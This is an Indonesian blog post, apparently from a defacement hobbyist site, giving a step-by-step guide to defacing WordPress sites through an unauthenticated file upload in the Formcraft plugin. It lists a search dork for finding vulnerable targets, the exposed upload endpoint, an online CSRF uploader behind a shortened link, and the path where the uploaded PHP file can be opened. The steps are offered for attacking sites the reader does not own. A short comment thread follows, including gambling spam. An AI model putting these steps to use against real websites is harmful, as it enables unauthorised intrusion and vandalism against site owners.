Home / Deface / Cara Deface Website Metode Formcraft File Upload

Wednesday, 3 August 2016

Cara Deface Website Metode Formcraft File Upload

Author - BAYU NOISE Date - 08:39 Deface

Kali ini ilmu deface akan share Cara Deface Website Metode Formcraft File Upload .

Baiklah, kita mulai saja cara deface metode Formcraft File Upload

1. Cari target menggunakan dork dibawah. Silahkan kembangkan sendiri.

inurl:/wp-content/plugins/formcraft/

2. Buka target, lalu tambahkan exploitnya setelah kata "/formcraft/” (tanpa tanda petik). Jika target tersebut vuln maka tampilanya kurang lebih seperti ini.

http://[site]/[path]/wp-content/plugins/formcraft/file-upload/server/php/index.php

3. Buka CSRF (saya menggunakan CSRF online buatan saya) http://sh.st/YiF8, masukan datanya seperti pada gambar.

4. Jika file berhasil terunggah maka tampilanya seperti gambar.

5. Buka file kalian yang telah terunggah di http://[site]/[path]/[exploit]/files/[filekalian].php

http://[site]/[path]/wp-content/plugins/formcraft/file-upload/server/php/files/[filekalian].php

3 comments:

baskoro3 August 2016 at 18:54
test dulu gan
ReplyDelete
Replies
Anonymous21 June 2017 at 23:38
I enjoyed over read your blog post. Your blog have nice information,
I got good ideas from this amazing blog
goldenslot

gclub online
ReplyDelete
Replies

Subscribe to: Post Comments (Atom)

TOP